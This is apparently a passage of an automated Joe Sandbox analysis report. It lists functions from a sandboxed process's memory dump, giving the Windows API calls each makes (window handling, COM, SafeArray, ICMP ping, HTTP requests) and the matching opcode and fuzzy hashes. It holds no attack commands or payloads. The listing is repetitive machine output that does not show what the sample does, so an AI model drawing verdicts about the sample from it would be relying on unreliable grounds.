                                              • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00F149F1
                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00F149FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                              • String ID: static
                                              • API String ID: 2559357485-2160076837
                                              • Opcode ID: 4aabdf02ce78fe88eaeacc8d866ff558ea18af675fb732efb711aba4ffc972ce
                                              • Instruction ID: 728a2b1bce071973826d74f27d9d38602c8260949561160dd758e5959dff8fe9
                                              • Opcode Fuzzy Hash: 4aabdf02ce78fe88eaeacc8d866ff558ea18af675fb732efb711aba4ffc972ce
                                              • Instruction Fuzzy Hash: 44318C32500219BBDF119FA4CC08FDB3BB9FF49364F124211FA68A60A0C735E851EBA4
                                              Function 00F0458D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00F045B9
                                              • CoInitialize.OLE32(00000000), ref: 00F045E7
                                              • CoUninitialize.OLE32 ref: 00F045F1
                                              • _wcslen.LIBCMT ref: 00F0468A
                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00F0470E
                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F04832
                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00F0486B
                                              • CoGetObject.OLE32(?,00000000,00F20B64,?), ref: 00F0488A
                                              • SetErrorMode.KERNEL32(00000000), ref: 00F0489D
                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F04921
                                              • VariantClear.OLEAUT32(?), ref: 00F04935
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                              • String ID:
                                              • API String ID: 429561992-0
                                              • Opcode ID: b8a32471f60ea002f53b5aa3d5890faceff94456548b9dd4ae9bf116831ccc75
                                              • Instruction ID: 51ba76a519d706a28f6374b8c8f4514538e5f8818f80ccf1615fd61560a1303b
                                              • Opcode Fuzzy Hash: b8a32471f60ea002f53b5aa3d5890faceff94456548b9dd4ae9bf116831ccc75
                                              • Instruction Fuzzy Hash: DBC156B1604305AFD700DF28C88496BB7E9FF89758F14491DFA899B290DB71EC05EB52
                                              Function 00EF83F0 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 00EF844D
                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EF84E9
                                              • SHGetDesktopFolder.SHELL32(?), ref: 00EF84FD
                                              • CoCreateInstance.OLE32(00F20CD4,00000000,00000001,00F47E8C,?), ref: 00EF8549
                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EF85CE
                                              • CoTaskMemFree.OLE32(?,?), ref: 00EF8626
                                              • SHBrowseForFolderW.SHELL32(?), ref: 00EF86B1
                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EF86D4
                                              • CoTaskMemFree.OLE32(00000000), ref: 00EF86DB
                                              • CoTaskMemFree.OLE32(00000000), ref: 00EF8730
                                              • CoUninitialize.OLE32 ref: 00EF8736
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                              • String ID:
                                              • API String ID: 2762341140-0
                                              • Opcode ID: dfd0874f65fe91f3915e7ea859cac414c041af7388e430725a4f538214fe12c5
                                              • Instruction ID: 6ef31031035ed85dd98f169a472b074447dd28e1a66b15655d2ab947c7b25991
                                              • Opcode Fuzzy Hash: dfd0874f65fe91f3915e7ea859cac414c041af7388e430725a4f538214fe12c5
                                              • Instruction Fuzzy Hash: D4C11A75A00109AFCB14DFA4C984DAEBBF9FF48344B159099E519EB261DB30ED45CB90
                                              Function 00EE0318 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00EE033F
                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00EE0398
                                              • VariantInit.OLEAUT32(?), ref: 00EE03AA
                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00EE03CA
                                              • VariantCopy.OLEAUT32(?,?), ref: 00EE041D
                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00EE0431
                                              • VariantClear.OLEAUT32(?), ref: 00EE0446
                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00EE0453
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EE045C
                                              • VariantClear.OLEAUT32(?), ref: 00EE046E
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EE0479
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                              • String ID:
                                              • API String ID: 2706829360-0
                                              • Opcode ID: 55a63f78a41ebcd64a4db748ad03b5d7980ede9fef401f0b0f03f103b12e1d65
                                              • Instruction ID: ab53106b7e473fa31fb5196b17e84e75e8056fba66f15a8239904c6b1995a10c
                                              • Opcode Fuzzy Hash: 55a63f78a41ebcd64a4db748ad03b5d7980ede9fef401f0b0f03f103b12e1d65
                                              • Instruction Fuzzy Hash: 4B416F75A0021DDFCB04DFA5C8449EEBBB9FF48344F018029E959B7261CB74A985DFA0
                                              Function 00F1A8E5 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 260windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E82441: GetWindowLongW.USER32(00000000,000000EB), ref: 00E82452
                                              • GetSystemMetrics.USER32(0000000F), ref: 00F1A926
                                              • GetSystemMetrics.USER32(0000000F), ref: 00F1A946
                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F1AB83
                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F1ABA1
                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F1ABC2
                                              • ShowWindow.USER32(00000003,00000000), ref: 00F1ABE1
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00F1AC06
                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00F1AC29
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                              • String ID:
                                              • API String ID: 1211466189-3916222277
                                              • Opcode ID: c74c922b396a20698f416a0abdd70999cb369026bc95211989a7f9828266c908
                                              • Instruction ID: 9e1fc7e0c7b854f3cd6e4ee13326e2bf9b063efce28e55c9d4b190b8a3b43a0e
                                              • Opcode Fuzzy Hash: c74c922b396a20698f416a0abdd70999cb369026bc95211989a7f9828266c908
                                              • Instruction Fuzzy Hash: F6B19931A01219DFDF14CF68C9857EE7BB2BF84711F098069EC499B295D734A980EB61
                                              Function 00F00EB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WSAStartup.WSOCK32(00000101,?), ref: 00F00F19
                                              • inet_addr.WSOCK32(?), ref: 00F00F79
                                              • gethostbyname.WSOCK32(?), ref: 00F00F85
                                              • IcmpCreateFile.IPHLPAPI ref: 00F00F93
                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F01023
                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F01042
                                              • IcmpCloseHandle.IPHLPAPI(?), ref: 00F01116
                                              • WSACleanup.WSOCK32 ref: 00F0111C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                              • String ID: Ping
                                              • API String ID: 1028309954-2246546115
                                              • Opcode ID: f17965871b4aaeecf0ee7c2f7a81c6eed87c470e4a90c975410ce07a0e30f972
                                              • Instruction ID: 679a53ce6081f0f88f3cac186fcc93800a1d3bdfd608bad9027d5b57f946f13c
                                              • Opcode Fuzzy Hash: f17965871b4aaeecf0ee7c2f7a81c6eed87c470e4a90c975410ce07a0e30f972
                                              • Instruction Fuzzy Hash: 8591C031A04241AFD720DF15C885B16BBE4FF49328F1485A9F5A99B7E2C731EC85EB81
                                              Function 00EF8AEF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocalTime.KERNEL32(?), ref: 00EF8BB1
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EF8BC1
                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EF8BCD
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EF8C6A
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF8C7E
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF8CB0
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EF8CE6
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF8CEF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CurrentDirectoryTime$File$Local$System
                                              • String ID: *.*
                                              • API String ID: 1464919966-438819550
                                              • Opcode ID: 70e1ad87512a37a44cab607e38352e2a877acae2c5be3bcb033806be2863b90e
                                              • Instruction ID: 3be00e819339acac85aa88a1121d3da908d0190f66ac3b1bd8b61b4860ab25c2
                                              • Opcode Fuzzy Hash: 70e1ad87512a37a44cab607e38352e2a877acae2c5be3bcb033806be2863b90e
                                              • Instruction Fuzzy Hash: C3617BB25043499FCB10EF60C9449AFB3E8FF89314F04981EFA99A7251DB31E945CB92
                                              Function 00F145A5 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateMenu.USER32 ref: 00F145D8
                                              • SetMenu.USER32(?,00000000), ref: 00F145E7
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F1466F
                                              • IsMenu.USER32(?), ref: 00F14683
                                              • CreatePopupMenu.USER32 ref: 00F1468D
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F146BA
                                              • DrawMenuBar.USER32 ref: 00F146C2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                              • String ID: 0$F
                                              • API String ID: 161812096-3044882817
                                              • Opcode ID: e9defe78cd80c56b33e2649f514f4c517ac037464e2b0cba5b8be5a57c449e00
                                              • Instruction ID: 86a3b97e7b9bf3b81599c3fdb365291bdd36cdfabe5662cbaf894ffcbc0a91c2
                                              • Opcode Fuzzy Hash: e9defe78cd80c56b33e2649f514f4c517ac037464e2b0cba5b8be5a57c449e00
                                              • Instruction Fuzzy Hash: 2A414D75A01209EFDF14CF64D854AEABBB5FF4A328F154028FA45A7350D731A960EF50
                                              Function 00EE276F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00EE4536: GetClassNameW.USER32(?,?,000000FF), ref: 00EE4559
                                              • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00EE27F4
                                              • GetDlgCtrlID.USER32 ref: 00EE27FF
                                              • GetParent.USER32 ref: 00EE281B
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EE281E
                                              • GetDlgCtrlID.USER32(?), ref: 00EE2827
                                              • GetParent.USER32(?), ref: 00EE283B
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EE283E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 711023334-1403004172
                                              • Opcode ID: 1d24b473b8713c9298cf77834ebceb724cea91c2fe777abbf99a2d703b29209f
                                              • Instruction ID: bb161ba826abf0b8552d2b4f6b61cc4af007585dbdd7b587c210e93ddbd8ed52
                                              • Opcode Fuzzy Hash: 1d24b473b8713c9298cf77834ebceb724cea91c2fe777abbf99a2d703b29209f
                                              • Instruction Fuzzy Hash: CB21C274D0021CBBCF15AFA1CC85EEEBBB8EF15310B00511ABA55A72E6DB795809DB60
                                              Function 00EE2850 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00EE4536: GetClassNameW.USER32(?,?,000000FF), ref: 00EE4559
                                              • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00EE28D3
                                              • GetDlgCtrlID.USER32 ref: 00EE28DE
                                              • GetParent.USER32 ref: 00EE28FA
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EE28FD
                                              • GetDlgCtrlID.USER32(?), ref: 00EE2906
                                              • GetParent.USER32(?), ref: 00EE291A
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EE291D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 711023334-1403004172
                                              • Opcode ID: 286d33278cb6a69343ff122d4a52ab14a0f9f472de4724db7aa4d607afb8b198
                                              • Instruction ID: 091104f973c3766a6549d36591e345cac273a227b02edba72ce37e96f57042e8
                                              • Opcode Fuzzy Hash: 286d33278cb6a69343ff122d4a52ab14a0f9f472de4724db7aa4d607afb8b198
                                              • Instruction Fuzzy Hash: 6521F675D0025CBBCF11AFA1DC45EEEBBB8EF05300F005016BA55B32A6D7799809DB60
                                              Function 00F14382 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F143FC
                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F143FF
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00F14426
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F14449
                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F144C1
                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00F1450B
                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00F14526
                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00F14541
                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00F14555
                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00F14572
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend$LongWindow
                                              • String ID:
                                              • API String ID: 312131281-0
                                              • Opcode ID: fd05ce5d8cbbca22b8b49e309036b9ad0f0d7318ee065c5ede0ca6d0a220a528
                                              • Instruction ID: fc6dbab0b3999452d3de062eb243087f7c19f0de588edc6b8d3df51b84e98fb6
                                              • Opcode Fuzzy Hash: fd05ce5d8cbbca22b8b49e309036b9ad0f0d7318ee065c5ede0ca6d0a220a528
                                              • Instruction Fuzzy Hash: BB616B75900208AFDB11DFA8CC81EEE77B9EF49710F144169FA14AB3A1C774AA85EF50
                                              Function 00EFCBB0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EFCBCF
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EFCBF7
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EFCC27
                                              • GetLastError.KERNEL32 ref: 00EFCC7F
                                              • SetEvent.KERNEL32(?), ref: 00EFCC93
                                              • InternetCloseHandle.WININET(00000000), ref: 00EFCC9E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                              • String ID:
                                              • API String ID: 3113390036-3916222277
                                              • Opcode ID: d957b77536c49036059dafe80fae4ba2b33cc8a2dcb48c2130587005baff7c0a
                                              • Instruction ID: 00e274a9f0950ca55e1a7cce5fdc7bb12de0fab862063ff04c2dfeb08d6c2316
                                              • Opcode Fuzzy Hash: d957b77536c49036059dafe80fae4ba2b33cc8a2dcb48c2130587005baff7c0a
                                              • Instruction Fuzzy Hash: BE319FB150020CAFD7219F61CE88ABBBBFCEF49744B30551EF64AA2200D730D904DB61
                                              Function 00EEA12A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00EC5437,?,?,Bad directive syntax error,00F1DCD0,00000000,00000010,?,?), ref: 00EEA14B
                                              • LoadStringW.USER32(00000000,?,00EC5437,?), ref: 00EEA152
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00EEA216
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: HandleLoadMessageModuleString_wcslen
                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                              • API String ID: 858772685-4153970271
                                              • Opcode ID: 5a125546e435fdeaf72d393114609ffaab75adea9cb298f1ae6b83b6ed21043f
                                              • Instruction ID: fe3d0f75e4af0f934af34ec9189af9bfea563feb2f4fb3ec5ee41325b0aa0a51
                                              • Opcode Fuzzy Hash: 5a125546e435fdeaf72d393114609ffaab75adea9cb298f1ae6b83b6ed21043f
                                              • Instruction Fuzzy Hash: 11213C3194025EAFCF11BF90CC06EEE7BB5BF18304F045869B519760A2EB71AA18EB51
                                              Function 00EE292F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetParent.USER32 ref: 00EE293B
                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00EE2950
                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EE29DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
